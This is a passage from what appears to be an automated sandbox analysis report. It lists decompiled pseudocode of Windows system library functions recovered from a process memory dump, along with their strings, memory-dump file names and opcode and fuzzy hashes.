					}
				}
			}

0x050bfab0
0x050bfab2
0x050bfab3
0x050bfab4
0x050bfabc
0x050bfac0
0x050bfb14
0x050bfb17
0x050bfac2
0x050bfac8
0x050bfacd
0x050bfad3
0x050bfad3
0x050bfadd
0x050bfb18
0x050bfb1b
0x050bfb1d
0x050bfb1e
0x050bfb1f
0x050bfb20
0x050bfb21
0x050bfb22
0x050bfb23
0x050bfb24
0x050bfb25
0x050bfb26
0x050bfb27
0x050bfb28
0x050bfb29
0x050bfb2a
0x050bfb2b
0x050bfb2c
0x050bfb2d
0x050bfb2e
0x050bfb2f
0x050bfb3a
0x050bfb3b
0x050bfb3e
0x050bfb41
0x050bfb44
0x050bfb47
0x050bfb4a
0x050bfb4d
0x050bfb53
0x050fbdcb
0x050fbdcb
0x050bfb59
0x050bfb5b
0x050bfb5b
0x050bfb5e
0x050fbdd5
0x050fbdd8
0x00000000
0x050fbdda
0x00000000
0x050fbdda
0x050bfb64
0x050bfb64
0x050bfb64
0x050bfb67
0x050bfb6e
0x050bfb70
0x050bfb72
0x00000000
0x050bfb78
0x050bfb7a
0x050bfb7a
0x050bfb7d
0x050bfb80
0x050fbddf
0x050fbde1
0x00000000
0x050fbde3
0x00000000
0x050fbde3
0x050bfb86
0x050bfb86
0x050bfb86
0x050bfb8b
0x050bfb90
0x050bfb92
0x050bfb94
0x050bfb9a
0x050bfb9b
0x050bfba1
0x050fbde8
0x050fbdeb
0x050fbded
0x050fbeb5
0x050fbeb5
0x050fbebb
0x050fbebd
0x050fbec3
0x050fbed2
0x050fbedd
0x050fbedd
0x050fbeed
0x00000000
0x050fbdf3
0x050fbdfe
0x050fbe06
0x050fbe0b
0x050fbe0d
0x050fbe0f
0x050fbe14
0x050fbe19
0x050fbe20
0x050fbe25
0x050fbe27
0x050fbe35
0x050fbe39
0x050fbe46
0x050fbe4f
0x050fbe54
0x050fbe56
0x050fbef8
0x050fbef8
0x00000000
0x050fbe5c
0x050fbe5c
0x050fbe60
0x00000000
0x050fbe66
0x050fbe66
0x050fbe7f
0x050fbe84
0x050fbe87
0x050fbe89
0x050fbe8b
0x050fbe99
0x050fbe9d
0x050fbea0
0x050fbeac
0x050fbeaf
0x050fbeb1
0x050fbeb3
0x050fbeb3
0x00000000
0x050fbea2
0x050fbea2
0x00000000
0x050fbea2
0x050fbe8d
0x050fbe8d
0x050fbe92
0x00000000
0x050fbe92
0x050fbe8b
0x050fbe60
0x050fbe3b
0x050fbe3b
0x050fbe3e
0x00000000
0x050fbe40
0x050fbe40
0x050fbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x050fbe44
0x050fbe3e
0x050fbe29
0x050fbe29
0x00000000
0x050fbe29
0x050fbe27
0x00000000
0x050bfba7
0x050bfba7
0x050bfbab
0x050fbf02
0x050bfbb1
0x050bfbb1
0x050bfbb8
0x050bfbbd
0x050bfbbd
0x050bfbbf
0x050bfbbf
0x050bfbc5
0x050bfbcb
0x050bfbf8
0x050bfbf8
0x050bfbfa
0x00000000
0x050bfc00
0x050bfc00
0x050bfc03
0x00000000
0x050bfc09
0x050bfc09
0x050bfc0f
0x050bfc15
0x050bfc23
0x050bfc23
0x050bfc25
0x050bfc27
0x050bfc75
0x050bfc7c
0x050bfc84
0x00000000
0x050bfc29
0x050bfc29
0x050bfc2d
0x050bfc30
0x050fbf0f
0x00000000
0x050bfc36
0x050bfc38
0x050bfc3b
0x050bfc41
0x050fbf17
0x050fbf19
0x050fbf48
0x050fbf4b
0x00000000
0x050fbf1b
0x050fbf22
0x050fbf24
0x050fbf26
0x00000000
0x050fbf2c
0x050fbf37
0x050fbf39
0x050fbf3b
0x00000000
0x050fbf41
0x050fbf41
0x050fbf41
0x050fbf41
0x050fbf45
0x00000000
0x050fbf45
0x050fbf3b
0x050fbf26
0x00000000
0x050bfc47
0x050bfc47
0x050bfc49
0x050bfcb2
0x050bfcb4
0x050bfcb6
0x050bfcdc
0x050bfcdc
0x00000000
0x050bfcb8
0x050bfcc3
0x050bfcc5
0x050bfcc7
0x00000000
0x050bfcc9
0x050bfcc9
0x050bfccd
0x00000000
0x050bfccd
0x050bfcc7
0x00000000
0x050bfc4b
0x050bfc4b
0x050bfc4e
0x050bfc4e
0x050bfc51
0x050bfc51
0x050bfc54
0x050bfc5a
0x050bfc5c
0x050bfc5f
0x050bfc61
0x050bfc63
0x050bfc65
0x050bfc67
0x050bfc6e
0x050bfc72
0x050bfc72
0x050bfc72
0x050bfc72
0x050bfc67
0x050bfc61
0x00000000
0x050bfc5a
0x050bfc49
0x050bfc41
0x050bfc30
0x050bfc27
0x050bfc03
0x050bfbcd
0x050bfbd3
0x050bfbd9
0x050bfbdc
0x050bfbde
0x050bfc99
0x050bfc9b
0x050bfc9d
0x050bfcd5
0x050bfcd5
0x050bfc89
0x050bfc89
0x00000000
0x050bfc9f
0x050bfc9f
0x050bfca3
0x00000000
0x050bfca3
0x00000000
0x050bfbe4
0x050bfbe4
0x050bfbe4
0x050bfbe4
0x050bfbe9
0x050bfbf2
0x00000000
0x050bfbf2
0x050bfbde
0x050bfbcb
0x050bfbab
0x050bfc8b
0x050bfc8b
0x050bfc8c
0x050bfb80
0x050bfb72
0x050bfb5e
0x050bfc8d
0x050bfc91
0x050bfadf
0x050bfadf
0x050bfae1
0x050bfae4
0x050bfae7
0x050bfaec
0x050bfaf8
0x050bfb00
0x050bfb07
0x050bfb0f
0x050bfb0f
0x050bfb07
0x00000000
0x050bfaf8
0x050bfadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 050FBE0F

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 58616f62b96ea870e5e5594a0f749995a38f062f62a0151843f64fecc1ad8ddf
Instruction ID: b9fc0694f42eb105659063dce0c3ae8c7b52b1296aa21c554d43e03182d59589
Opcode Fuzzy Hash: 58616f62b96ea870e5e5594a0f749995a38f062f62a0151843f64fecc1ad8ddf
Instruction Fuzzy Hash: 05A10271B106069BEB65DF68E894BFEB3F6BF44710F044579E906DBA80DBB4D8418B80

Uniqueness

Uniqueness Score: -1.00%

Function 05082D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E05082D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x5175350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x5177bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E050C97C0();
				}
				if( *0x51779c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x51779c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E050B1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E050A7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0511FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E050C9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E050BE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L050DDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x5176901;
								_push(_t109);
								_v52 = _t98;
								if( *0x5176901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E050C9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E050C95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E050A7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E050A7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E05107016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0511FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x5175350;
							if(_t109 != 0x5175350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0511FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E05115720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x05082d8a
0x05082d8a
0x05082d92
0x05082d96
0x05082d9e
0x05082da0
0x05082da3
0x05082da5
0x05082da8
0x05082dab
0x05082db2
0x050df9aa
0x050df9ab
0x050df9ae
0x050df9ae
0x05082db8
0x05082dc2
0x050df9b9
0x050df9be
0x050df9bf
0x050df9bf
0x05082dcf
0x050df9c9
0x05082dd5
0x05082dd5
0x05082dd5
0x05082dde
0x05082de1
0x05082e70
0x05082e72
0x05082e72
0x05082de7
0x05082deb
0x05082e7c
0x05082e83
0x05082e85
0x05082e8b
0x05082e8d
0x05082e92
0x05082e92
0x05082e85
0x05082df1
0x05082df7
0x05082df9
0x05082df9
0x05082dfc
0x05082dff
0x05082e02
0x00000000
0x05082e05
0x05082e0c
0x050df9d9
0x05082e12
0x05082e12
0x05082e12
0x05082e1a
0x050df9e3
0x050df9e9
0x050df9f0
0x050df9f6
0x050df9f8
0x050df9f8
0x050df9f0
0x05082e23
0x050dfa02
0x050dfa03
0x050dfa05
0x050dfa06
0x00000000
0x05082e29
0x05082e29
0x05082e2e
0x05082e34
0x05082e3e
0x00000000
0x00000000
0x05082e44
0x05082e47
0x05082e4d
0x00000000
0x00000000
0x05082e4f
0x05082e54
0x00000000
0x00000000
0x05082e5a
0x05082e5f
0x05082e9a
0x05082ea4
0x05082ea5
0x05082ea8
0x05082eaf
0x05082eb2
0x05082eb5
0x050dfae9
0x050dfaeb
0x050dfaed
0x050dfaef
0x050dfaf7
0x050dfaf8
0x050dfafd
0x050dfaff
0x050dfb04
0x050dfb04
0x050dfaff
0x05082ec0
0x05082ec4
0x05082ec6
0x05082ec8
0x050dfb14
0x050dfb18
0x050dfb1e
0x050dfb21
0x050dfb21
0x05082ece
0x05082ece
0x05082ece
0x05082ed7
0x05082e61
0x05082e63
0x050dfa6b
0x050dfa71
0x050dfa76
0x050dfa78
0x050dfa8a
0x050dfa7a
0x050dfa83
0x050dfa83
0x050dfa8f
0x050dfa91
0x050dfa97
0x050dfa9d
0x050dfaa4
0x050dfaaa
0x050dfaaf
0x050dfab1
0x050dfac3
0x050dfab3
0x050dfabc
0x050dfabc
0x050dfac8
0x050dfacb
0x050dfadf
0x050dfadf
0x050dfacb
0x050dfaa4
0x050dfa91
0x05082e6f
0x05082e6f
0x05082e5f
0x050dfa13
0x050dfa15
0x050dfa17
0x050dfa1f
0x050dfa21
0x050dfa22
0x050dfa25
0x050dfa28
0x050dfa2f
0x050dfa2f
0x050dfa2a
0x050dfa2a
0x050dfa2a
0x050dfa31
0x050dfa34
0x050dfa36
0x050dfa3c
0x050dfa3e
0x050dfa41
0x050dfa43
0x050dfa45
0x050dfa45
0x050dfa41
0x050dfa3c
0x050dfa4a
0x050dfa4f
0x050dfa51
0x050dfa53
0x050dfa56
0x050dfa5b
0x050dfa5e
0x00000000
0x050dfa5e
0x05082e23

Strings

RTL: Re-Waiting, xrefs: 050DFA4A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 16bd5b50dca10b7ce8eeb9cafcba50adfc64efe55ecd0dfe69a9ce427a573708
Instruction ID: 7242359c70df2f99409eecefc4fb84d90420ee46ee8242132157664d49d464da
Opcode Fuzzy Hash: 16bd5b50dca10b7ce8eeb9cafcba50adfc64efe55ecd0dfe69a9ce427a573708
Instruction Fuzzy Hash: 8A612471A047469FDB21EF68E884F7EB7F6FB40314F148269E8529B2C0C778994187A1

Uniqueness

Uniqueness Score: -1.00%

Function 05150EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05150EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0514FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05151074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E050C9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0514A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0514A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x5178b04 >> 0x14) + (_v44 -  *0x5178b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E050A7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0514138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E050A7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0513FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x5178724 & 0x00000008) != 0) {
						E051452F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E051515B5(0x5178ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x05150eb7
0x05150eb9
0x05150ec0
0x05150ec2
0x05150ecd
0x0515105b
0x0515105b
0x05151061
0x05151066
0x05151066
0x0515106b
0x05151073
0x05151073
0x05150ed3
0x05150ed6
0x05150edc
0x05150ee0
0x05150ee7
0x05150ef0
0x05150ef5
0x05150efa
0x05150efc
0x05150efd
0x05150f03
0x05150f04
0x05150f06
0x05150f07
0x05150f09
0x05150f0e
0x05150f14
0x05150f23
0x05150f2d
0x05150f34
0x05150f34
0x05150f14
0x05150f52
0x00000000
0x00000000
0x05150f58
0x05150f73
0x05150f74
0x05150f79
0x05150f7d
0x05150f80
0x05150f86
0x05150fab
0x05150fb5
0x05150fc6
0x05150fd1
0x05150fe3
0x05150fd3
0x05150fdc
0x05150fdc
0x05150feb
0x05151009
0x05151009
0x05151015
0x05151027
0x05151017
0x05151020
0x05151020
0x0515102f
0x0515103c
0x0515103c
0x05151048
0x05151050
0x05151050
0x05151055
0x00000000
0x05151055
0x05150f88
0x05150f9e
0x05150fa2
0x05150fa9
0x00000000
0x00000000
0x00000000
0x05150fa9
0x00000000

Strings

`, xrefs: 05150F16

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: c74f4b5786c17d65cb7d985e8e069d8b3adc85b7efb0a9ed143e9a7b13ff06c7
Instruction ID: de9858ec39e1469fc39fc36f0e6760dac933ab252d99fd6500ece5f16904658a
Opcode Fuzzy Hash: c74f4b5786c17d65cb7d985e8e069d8b3adc85b7efb0a9ed143e9a7b13ff06c7
Instruction Fuzzy Hash: 4251BE71208341EFD325DF28D888B5BB7E5FB88320F04092DF9A687291D774E905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 050BF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E050BF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E050A4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E050C9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E050C9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E050C95D0();
							goto L11;
						} else {
							_t109 = L050A4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E050CF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E050C95D0();
										L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x050bf0d3
0x050bf0d9
0x050bf0e0
0x050bf0e7
0x050bf0f2
0x050bf0f4
0x050bf0f8
0x050bf100
0x050bf108
0x050bf10d
0x050bf115
0x050bf116
0x050bf11f
0x050bf123
0x050bf124
0x050bf12c
0x050bf130
0x050bf134
0x050bf13d
0x050bf144
0x050bf14b
0x050bf152
0x050fbab0
0x050fbab0
0x050bf158
0x050bf158
0x050bf15a
0x050bf160
0x050bf165
0x050bf166
0x050bf16f
0x050bf173
0x050fbaa7
0x050fbaa7
0x050fbaab
0x00000000
0x050bf179
0x050bf18d
0x050bf191
0x050fbaa2
0x00000000
0x050bf197
0x050bf19b
0x050bf1a2
0x050bf1a9
0x050bf1af
0x050bf1b2
0x050bf1b6
0x050bf1b9
0x050bf1c4
0x050bf1d8
0x050bf1df
0x050bf1e3
0x050bf1eb
0x050bf1ee
0x050bf1f4
0x050bf20f
0x050fbab7
0x050fbabb
0x050fbacc
0x050fbad1
0x050bf215
0x050bf218
0x050bf226
0x050bf22b
0x00000000
0x050bf22b
0x050bf1f6
0x050bf1f6
0x050bf1f9
0x050bf1fb
0x050bf1fb
0x050bf1f4
0x050bf191
0x050bf173
0x050bf152
0x050bf203

Strings

@, xrefs: 050BF124

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 537336c3bec38fcdf4c08603b73f486f41aa162c1d5ca36e0c0600a4931af489
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 78518F726047119FD321DF59D840AABBBF9FF48710F00892DF99587650E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05103540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E05103540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x517d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E050C0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E05103706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E050CFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E05103540;
						E050CFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E050DDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E05110C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E050C97C0();
					}
					return E050CB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E05103971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E05103884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E050CFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E050C9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E05103787(_a4,  &_v352, _t80);
						}
					}
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E050C95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x05103552
0x0510355a
0x0510355d
0x05103566
0x05103567
0x0510357e
0x0510358f
0x051035a1
0x051035a5
0x0510366b
0x0510366b
0x0510366d
0x05103672
0x05103679
0x05103685
0x0510368d
0x0510369d
0x051036a7
0x051036b8
0x051036c6
0x051036c7
0x051036dc
0x051036e1
0x051036e7
0x051036e9
0x051036e9
0x05103703
0x05103703
0x051035b5
0x051035c0
0x051035c4
0x00000000
0x00000000
0x051035ca
0x051035d7
0x051035e2
0x051035e6
0x051035e8
0x051035f5
0x051035fa
0x05103603
0x05103604
0x05103609
0x0510360a
0x05103612
0x05103613
0x0510361e
0x05103622
0x05103628
0x0510362f
0x0510362f
0x05103636
0x05103638
0x0510363b
0x05103642
0x05103642
0x05103636
0x05103657
0x05103657
0x0510365c
0x05103662
0x05103669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0510358F

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
